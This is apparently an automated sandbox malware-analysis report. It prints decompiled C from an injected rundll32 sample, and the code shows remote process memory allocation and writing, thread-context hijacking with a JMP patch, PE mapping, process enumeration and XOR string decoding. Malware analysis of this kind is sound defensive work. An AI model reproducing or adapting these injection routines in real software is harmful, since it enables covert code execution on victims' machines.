0x0494bce7
0x0494bcec
0x0494bcf4
0x0494bcfa
0x0494bd02
0x0494bd14
0x0494bd1a
0x0494bd22
0x0494bd27
0x0494bd34
0x0494bd45
0x0494bd4b
0x0494bd50
0x0494bd53
0x0494bd56
0x0494bd63
0x0494bd69
0x0494bd73
0x0494bd73
0x0494bd79
0x0494bd81
0x0494bd8c
0x0494bd91
0x0494bd97
0x0494bd99
0x0494bda6
0x0494bda7
0x0494bda8
0x0494bdb3
0x0494bdb5
0x0494bdbc
0x0494bdbc
0x0494bdc6
0x0494bdcb
0x0494bdd0
0x0494bdd0
0x0494bdd6
0x0494bddd
0x0494bdde
0x0494bdeb
0x0494bdfe
0x0494be03
0x0494be08
0x0494be11
0x0494be11
0x0494be17
0x0494be1c
0x0494be22
0x0494be28
0x0494be2d
0x0494be36
0x0494be38
0x0494be3f
0x0494be3f
0x0494be45
0x0494be4d
0x0494be52
0x0494be53
0x0494be58
0x0494be61
0x0494be63
0x0494be6e
0x0494be6e
0x0494be77
0x0494be7f
0x0494be86
0x0494be8b
0x0494be9a
0x0494beb2
0x0494beb9
0x0494bec7
0x0494bed2
0x0494bed3
0x0494bed7
0x0494bedd
0x0494bede
0x0494bee6
0x0494beeb
0x00000000
0x0494bef3
0x0494bef7

APIs

GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0494BB74
GetLastError.KERNEL32(?,?,00000000), ref: 0494BC6E
GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 0494BD56

Part of subcall function 0494DC83: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04940000), ref: 0494DD27

GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 0494BD81

Strings

TEMP, xrefs: 0494BE22, 0494BE2D, 0494BE3E
SystemDrive, xrefs: 0494BE4D, 0494BE58, 0494BE6D
TEMP, xrefs: 0494BDED
%s\%s, xrefs: 0494BDF3
USERPROFILE, xrefs: 0494BDDE, 0494BE0C

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3040727122-2706916422
Opcode ID: 0eb316aabf8ec5168b62c8d731872c87397ccb2c46a4bb53f33828bab8d0034a
Instruction ID: 60926ce8ac20a75d5df65747f49dbe862098162f9e61489d83e176938409faad
Opcode Fuzzy Hash: 0eb316aabf8ec5168b62c8d731872c87397ccb2c46a4bb53f33828bab8d0034a
Instruction Fuzzy Hash: 8BA14C71741605EFE704EF74D888FEABBA8FF89304F104279E51997241EB74BA058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0494A823 Relevance: 6.1, APIs: 4, Instructions: 104
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0494A823(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v15;
				void _v16;
				long _v20;
				void* _v24;
				long _v28;
				void* _v32;
				struct _CONTEXT _v748;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t39;
				void* _t41;
				void _t49;
				intOrPtr _t66;
				void* _t68;
				long _t70;
				void* _t73;
				void** _t77;
				void* _t80;

				_t37 =  *0x4960fd8; // 0x49ffc50
				_t77 = __edx;
				_t68 = __ecx;
				if(( *(_t37 + 0x1898) & 0x00fe0286) == 0) {
					_t38 =  *0x49610b0;
				} else {
					_t38 = E0494A222(__ecx, __edx);
					 *0x49610b0 = _t38;
				}
				if(_t38 == 0) {
					_t66 =  *0x4960fe4; // 0x49ff9f0
					 *0x49610b0 = _t66;
				}
				_t39 = E0494A412( *_t77, _a4); // executed
				_t80 = _t39;
				if(_t80 == 0) {
					L13:
					E0494A356();
					_t41 = _t80;
					goto L14;
				} else {
					E049492A2( &_v748, 0, 0x2cc);
					_v748.ContextFlags = 0x10002;
					if(GetThreadContext(_t77[1],  &_v748) == 0) {
						goto L13;
					}
					_v20 = _v20 & 0x00000000;
					_t73 = _v748.Eax;
					_t49 = _t80 - _a4 + _t68;
					if(_a8 != 1) {
						if(_a8 != 2) {
							_t41 = 0;
							L14:
							return _t41;
						}
						_v16 = _t49;
						_t70 = 8;
						L11:
						_v32 = _t73;
						_v24 = _t73;
						_v8 = _t70;
						NtProtectVirtualMemory( *_t77,  &_v24,  &_v8, 4,  &_v20);
						if(NtWriteVirtualMemory( *_t77, _v748.Eax,  &_v16, _t70,  &_v8) >= 0) {
							_v28 = _v28 & 0x00000000;
							NtProtectVirtualMemory( *_t77,  &_v32,  &_v8, _v20,  &_v28);
						} else {
							_t80 = 0;
						}
						goto L13;
					}
					_v16 = 0xe9;
					_t70 = 5;
					_v15 = _t49 - _t73 - _t70;
					goto L11;
				}
			}

0x0494a826
0x0494a83e
0x0494a840
0x0494a842
0x0494a850
0x0494a844
0x0494a844
0x0494a849
0x0494a849
0x0494a857
0x0494a859
0x0494a85e
0x0494a85e
0x0494a868
0x0494a86d
0x0494a871
0x0494a923
0x0494a923
0x0494a928
0x00000000
0x0494a877
0x0494a885
0x0494a88d
0x0494a8ae
0x00000000
0x00000000
0x0494a8b0
0x0494a8b9
0x0494a8bf
0x0494a8c5
0x0494a8db
0x0494a94e
0x0494a92a
0x0494a92e
0x0494a92e
0x0494a8df
0x0494a8e2
0x0494a8e3
0x0494a8e6
0x0494a8ef
0x0494a8f6
0x0494a901
0x0494a91f
0x0494a92f
0x0494a949
0x0494a921
0x0494a921
0x0494a921
0x00000000
0x0494a91f
0x0494a8cb
0x0494a8cf
0x0494a8d2
0x00000000
0x0494a8d2

APIs

GetThreadContext.KERNELBASE(?,00010002), ref: 0494A8A6
NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000), ref: 0494A901
NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001), ref: 0494A91A

Part of subcall function 0494A222: LoadLibraryW.KERNEL32(00000000), ref: 0494A2F2

NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000), ref: 0494A949

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$Protect$ContextLibraryLoadThreadWrite
String ID:
API String ID: 2853935321-0
Opcode ID: 995d246d4799b7bc36d15e70902fcae852dfd750e6bdff3d776462bd15d49d94
Instruction ID: 96f4206da6907025d766265045298d4660b976efa831671f489dfb85f461a3ef
Opcode Fuzzy Hash: 995d246d4799b7bc36d15e70902fcae852dfd750e6bdff3d776462bd15d49d94
Instruction Fuzzy Hash: 73414A72A44219EFDB10CF94D989EEEBBB9FB48350F004579E508E7250E735AA44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04941015 Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				void _v257;
				char _v258;
				char _v260;
				short _v772;
				intOrPtr _t21;
				WCHAR* _t28;
				long _t29;
				char _t32;
				char _t33;
				int _t44;
				void* _t48;
				void* _t58;
				int _t61;
				intOrPtr* _t63;

				_t48 = __ecx;
				if(_a8 != 1) {
					if(_a8 != 0) {
						L11:
						return 1;
					}
					_t21 =  *0x4960fa0; // 0x49ff8a0
					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
					L3:
					return 0;
				}
				E0494910A();
				E049494E5();
				 *0x4960fa8 = _a4;
				 *0x4960fa4 = 1;
				E04954357(_a4);
				 *_t63 = 0x14c; // executed
				_t28 = E049490EA(_t48); // executed
				_a8 = _t28;
				_t29 = GetFileAttributesW(_t28); // executed
				if(_t29 == 0xffffffff) {
					E04949D66( &_a8);
					_t58 = 0x14;
					_t61 = 0;
					do {
						_t32 =  *0x495d868; // 0x6665
						_v260 = _t32;
						_t33 =  *0x495d86a; // 0x0
						_v258 = _t33;
						memset( &_v257, 0, 0xfd);
						memset( &_v772, 0, 0x200);
						_t63 = _t63 + 0x18;
						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
						_t58 = _t58 - 1;
					} while (_t58 != 0);
					 *0x4960fa0 = E04949491(0x144, 0x26e);
					_a8 =  *[fs:0x30];
					if(_a8[1] == 0) {
						L10:
						goto L11;
					}
					_t44 = 0;
					do {
						 *(_t44 + 0x495f820) =  *(_t44 + 0x495f820) ^ 0x00000009;
						_t44 = _t44 + 1;
					} while (_t44 < 0x80);
					do {
						 *(_t61 + 0x495f050) =  *(_t61 + 0x495f050) ^ 0x000000aa;
						_t61 = _t61 + 1;
					} while (_t61 < 0x80);
					goto L10;
				}
				E04949D66( &_a8);
				goto L3;
			}

0x04941015
0x04941025
0x0494113d
0x04941132
0x00000000
0x04941132
0x0494113f
0x04941149
0x0494106f
0x00000000
0x0494106f
0x0494102b
0x04941030
0x04941039
0x0494103e
0x04941044
0x04941049
0x04941050
0x04941057
0x0494105a
0x04941066
0x04941079
0x04941081
0x04941082
0x04941084
0x04941084
0x0494108a
0x04941091
0x0494109b
0x049410a9
0x049410bb
0x049410c0
0x049410da
0x049410e0
0x049410e0
0x049410fa
0x04941105
0x0494110f
0x04941130
0x00000000
0x04941131
0x04941111
0x04941118
0x04941118
0x0494111f
0x04941120
0x04941124
0x04941124
0x0494112b
0x0494112c
0x00000000
0x04941124
0x04941069
0x00000000

APIs

Part of subcall function 0494910A: HeapCreate.KERNELBASE(00000000,00096000,00000000,04941030), ref: 04949113

GetFileAttributesW.KERNELBASE(00000000), ref: 0494105A
memset.MSVCRT ref: 049410A9
memset.MSVCRT ref: 049410BB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 049410DA

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: memset$AttributesByteCharCreateFileHeapMultiWide
String ID:
API String ID: 371002992-0
Opcode ID: a990b7d48b967e5304234dd068e489c7743b8ff50a51d3704304198bcbaa399f
Instruction ID: 7b5528f8896bebea3c2e9409b4086af109a0f2f6b30cf706823d563b6c406549
Opcode Fuzzy Hash: a990b7d48b967e5304234dd068e489c7743b8ff50a51d3704304198bcbaa399f
Instruction Fuzzy Hash: 4831F571504354AFE720EF78DC49F9A7BACEB89324F10817AE559CB181D774A981CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0494CA0F Relevance: 6.1, APIs: 4, Instructions: 63
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0494CA0F(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
				void* _v8;
				long _v12;
				long _v16;
				long _t25;
				long _t37;
				void* _t41;
				void* _t42;

				_t37 = _a8;
				_t41 = __ecx;
				_a8 = _t37;
				_t42 = __edx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
				if(_t25 < 0) {
					L6:
					return 0;
				}
				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
					L4:
					if(_v8 != 0) {
						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
					}
					goto L6;
				}
				_a8 = _t37;
				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
					goto L4;
				}
				return _v8;
			}

0x0494ca16
0x0494ca26
0x0494ca28
0x0494ca31
0x0494ca33
0x0494ca38
0x0494ca3b
0x0494ca3e
0x0494ca42
0x0494ca8d
0x00000000
0x0494ca8d
0x0494ca55
0x0494ca76
0x0494ca7a
0x0494ca8a
0x0494ca8a
0x00000000
0x0494ca7a
0x0494ca5a
0x0494ca6f
0x00000000
0x00000000
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 0494CA3E
NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA50
NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA6A
NtFreeVirtualMemory.NTDLL(?,00000000,00000000,00008000), ref: 0494CA8A

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateFreeProtectWrite
String ID:
API String ID: 727285278-0
Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction ID: ff7dde54b40ca65cbc6c5bc550a0dec06cf0d73bbc9c3a1b02d2311a1babb489
Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction Fuzzy Hash: 4811E3B6A0110DBFDB15DF95C944EDEBBBCEF48354F10806ABA19E6140E730EB049BA4

Uniqueness

Uniqueness Score: -1.00%

Function 049543F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E049543F4(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				long _v44;
				void* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				char _v76;
				void* _t180;
				void* _t181;

				_v64 = _v64 & 0x00000000;
				if(_a12 == 0) {
					return __eax | 0xffffffff;
				}
				_v32 = _a12;
				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
				_v52 = _v40;
				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
				_v20 = _a12 + _t16;
				_v36 = _v36 & 0x00000000;
				do {
				} while (0 != 0);
				_v44 = 4;
				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
				_v48 = _a16;
				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
				if(_v28 >= 0) {
					_v12 = _v12 & 0x00000000;
					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
							E049492A2( &_v76, 0, 9);
							E04949202( &_v76, _v12 * 0x28 + _v20, 8);
							_t181 = _t181 + 0x18;
							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
							_v8 = _v8 & 0x00000000;
							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
							_v16 = _v56;
							if(_v16 == 0x20000000) {
								_v8 = 0x10;
							} else {
								if(_v16 == 0x40000000) {
									_v8 = 2;
									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
										_v8 = 4;
									}
								} else {
									if(_v16 == 0x60000000) {
										_v8 = 0x20;
									} else {
										if(_v16 == 0x80000000) {
											_v8 = 4;
										} else {
											if(_v16 == 0xa0000000) {
												_v8 = 0x40;
											} else {
												if(_v16 == 0xc0000000) {
													_v8 = 4;
												} else {
													if(_v16 == 0xe0000000) {
														_v8 = 0x40;
													}
												}
											}
										}
									}
								}
							}
							while(0 != 0) {
							}
							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
							if(_v28 >= 0) {
								while(0 != 0) {
								}
								L43:
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							while(0 != 0) {
							}
							goto L43;
						}
						goto L10;
					}
					return 0;
				}
				L6:
				if(0 == 0) {
					return 0xffffffff;
				} else {
				}
				goto L6;
			}

0x049543fa
0x04954402
0x00000000
0x04954404
0x0495440f
0x0495441b
0x04954421
0x0495442d
0x04954434
0x04954437
0x0495443b
0x0495443b
0x04954441
0x04954453
0x04954459
0x04954474
0x0495447b
0x0495448b
0x04954498
0x049544b4
0x049544c0
0x049544d6
0x049544db
0x049544ec
0x049544ef
0x04954503
0x04954509
0x04954513
0x04954564
0x04954515
0x0495451c
0x04954570
0x04954585
0x049545c6
0x049545c6
0x0495451e
0x04954525
0x049545cf
0x0495452b
0x04954532
0x049545d8
0x04954538
0x0495453f
0x049545e1
0x04954545
0x0495454c
0x049545ea
0x04954552
0x04954559
0x049545f3
0x049545f3
0x04954559
0x0495454c
0x0495453f
0x04954532
0x04954525
0x0495451c
0x049545fa
0x049545fe
0x0495460b
0x04954626
0x0495462d
0x04954637
0x0495463b
0x0495463d
0x04954491
0x04954495
0x00000000
0x04954495
0x0495462f
0x04954633
0x00000000
0x04954635
0x00000000
0x049544b6
0x00000000
0x04954642
0x0495447d
0x0495447f
0x00000000
0x00000000
0x04954481
0x00000000

APIs

NtProtectVirtualMemory.NTDLL(049443D8,?,?,00000004,00000000), ref: 04954471

Strings

@, xrefs: 049545F3

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @
API String ID: 2706961497-2766056989
Opcode ID: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
Instruction ID: 8471b3f3f17ccac32bced7fe31a5186a830fc9fe5665beadfb2ae7974defd6de
Opcode Fuzzy Hash: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
Instruction Fuzzy Hash: 9C711AB0900249DFDF90CFA4C585BEDBBF9AB04309F208576D811E62A0E774EA96DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0494C71C Relevance: 4.6, APIs: 3, Instructions: 82
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0494C71C(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				signed int _t20;
				signed int _t21;
				char _t27;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t49;
				void* _t51;
				void* _t55;
				void* _t57;

				_t40 = __edx;
				_v304 = __ecx;
				_t20 = CreateToolhelp32Snapshot(2, 0);
				_t57 = _t20;
				_t21 = _t20 | 0xffffffff;
				if(_t57 != _t21) {
					E049492A2( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t57,  &_v304) != 0) {
						_t27 = E0494911F(0x20);
						_v316 = _t27;
						_t51 = 0x1f;
						do {
							_t9 = _t51 + 0x63; // 0x82
							 *((char*)(_t51 + _t27)) = _t9;
							_t51 = _t51 - 1;
						} while (_t51 >= 0);
						E0494913B( &_v316, 0);
						while(1) {
							_t55 = _v312( &_v308, _t40);
							if(_t55 == 0) {
								break;
							}
							_t49 =  *0x4960fa0; // 0x49ff8a0
							_push( &_v308);
							_push(_t57);
							if( *((intOrPtr*)(_t49 + 0x48))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t57);
						_t21 = 0 | _t55 == 0x00000000;
					} else {
						_t37 =  *0x4960fa0; // 0x49ff8a0
						 *((intOrPtr*)(_t37 + 0x34))(_t57);
						_t21 = 0xfffffffe;
					}
				}
				return _t21;
			}

0x0494c734
0x0494c736
0x0494c73a
0x0494c73d
0x0494c73f
0x0494c744
0x0494c757
0x0494c75f
0x0494c773
0x0494c785
0x0494c78d
0x0494c791
0x0494c792
0x0494c792
0x0494c795
0x0494c798
0x0494c798
0x0494c7a4
0x0494c7ab
0x0494c7b5
0x0494c7bb
0x00000000
0x00000000
0x0494c7bd
0x0494c7c7
0x0494c7c8
0x0494c7ce
0x00000000
0x00000000
0x00000000
0x0494c7ce
0x0494c7d6
0x0494c7dd
0x0494c775
0x0494c775
0x0494c77b
0x0494c780
0x0494c780
0x0494c773
0x0494c7e6

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 0494C73A

Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4

Process32First.KERNEL32(00000000,?), ref: 0494C76E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0494C7D6

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
String ID:
API String ID: 3344077921-0
Opcode ID: d463c10afd01cc325e1815e3a28ec3940a621ba3fa2a203be9275f86b6328a97
Instruction ID: c6ac3af2663918f34500259e146cf1f0113371053449d1f06ea9043260cb5c1a
Opcode Fuzzy Hash: d463c10afd01cc325e1815e3a28ec3940a621ba3fa2a203be9275f86b6328a97
Instruction Fuzzy Hash: 5721C1736092019FD310DE68E889EAA7BA8EFC9360F15053EF650CB181EB60E905C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0494A412 Relevance: 3.1, APIs: 2, Instructions: 107
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0494A412(void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				long _t37;
				void* _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				void* _t58;
				void* _t71;
				intOrPtr* _t73;

				_v8 = _v8 & 0x00000000;
				_t71 = __edx;
				_t58 = __ecx;
				_t3 = _t71 + 0x3c; // 0x100
				_t73 =  *_t3 + __edx;
				if( *_t73 != 0x4550) {
					L5:
					return 0;
				}
				_v16 =  *(_t73 + 0x50);
				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
				if(_t37 < 0) {
					goto L5;
				}
				_t38 = E0494918A( *0x4960fd8, 0x1ac4);
				_v12 = _t38;
				if(_t38 == 0) {
					goto L5;
				}
				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
				_t39 = E0494CA0F( *0x49610b0, _t58, _t38, 0x1ac4, 4); // executed
				_v20 = _t39;
				_push(0x1ac4);
				_push( &_v12);
				if(_t39 != 0) {
					E0494913B();
					_t42 =  *0x4960fa8; // 0x4940000
					_v24 = _t42;
					_t43 =  *0x4960fd8; // 0x49ffc50
					_v28 = _t43;
					 *0x4960fa8 = _v8;
					 *0x4960fd8 = _v20;
					_t46 = E0494918A(_t71,  *(_t73 + 0x50)); // executed
					_v12 = _t46;
					if(_t46 == 0) {
						goto L5;
					}
					E0494A391(_t46, _v8, _t71);
					_v32 = _v32 & 0x00000000;
					 *0x4960fa8 = _v24;
					 *0x4960fd8 = _v28;
					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
						goto L5;
					}
					E049543F4(_t52,  *0x49610b0, _t58, _t71, _v8); // executed
					E0494913B( &_v12, 0);
					return _v8;
				}
				E0494913B();
				goto L5;
			}

0x0494a418
0x0494a41f
0x0494a421
0x0494a423
0x0494a426
0x0494a42e
0x0494a4a4
0x00000000
0x0494a4a4
0x0494a435
0x0494a44d
0x0494a451
0x00000000
0x00000000
0x0494a45e
0x0494a463
0x0494a46a
0x00000000
0x00000000
0x0494a473
0x0494a485
0x0494a48d
0x0494a495
0x0494a49a
0x0494a49b
0x0494a4ab
0x0494a4b0
0x0494a4b5
0x0494a4b8
0x0494a4bd
0x0494a4c3
0x0494a4cb
0x0494a4d4
0x0494a4dc
0x0494a4e1
0x00000000
0x00000000
0x0494a4e9
0x0494a4f1
0x0494a4f5
0x0494a4fe
0x0494a51b
0x00000000
0x00000000
0x0494a528
0x0494a533
0x00000000
0x0494a53b
0x0494a49d
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(049443D8,00000000,00000000,?,00003000,00000040,?,00000000,049443D8), ref: 0494A44D
NtWriteVirtualMemory.NTDLL(049443D8,00000000,?,?,00000000), ref: 0494A516

Part of subcall function 0494CA0F: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 0494CA3E
Part of subcall function 0494CA0F: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA50
Part of subcall function 0494CA0F: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 0494CA6A

Part of subcall function 0494913B: HeapFree.KERNEL32(00000000,00000000), ref: 04949181

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
String ID:
API String ID: 4171237596-0
Opcode ID: 6bc7506ba279e34345f7ef5a65d7d75cf688c21a443529c76c966efe94b824e7
Instruction ID: ddfb2458d3c87a6fa53ee800a38ca8efa121b8a5fcdbcc4ac992f8f4e13dd7a2
Opcode Fuzzy Hash: 6bc7506ba279e34345f7ef5a65d7d75cf688c21a443529c76c966efe94b824e7
Instruction Fuzzy Hash: AC4119B1A44209FFEB00DFA4D985EAEBBF8EB88314F104179E500E7280E775AE419B54

Uniqueness

Uniqueness Score: -1.00%

Function 0494A664 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0494A664(WCHAR* __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v29;
				intOrPtr _v40;
				short _v44;
				void* __ebx;
				signed int _t48;
				signed int _t57;
				intOrPtr _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				char _t80;
				char _t94;
				signed int _t96;
				char _t97;
				signed int _t98;
				signed int _t99;
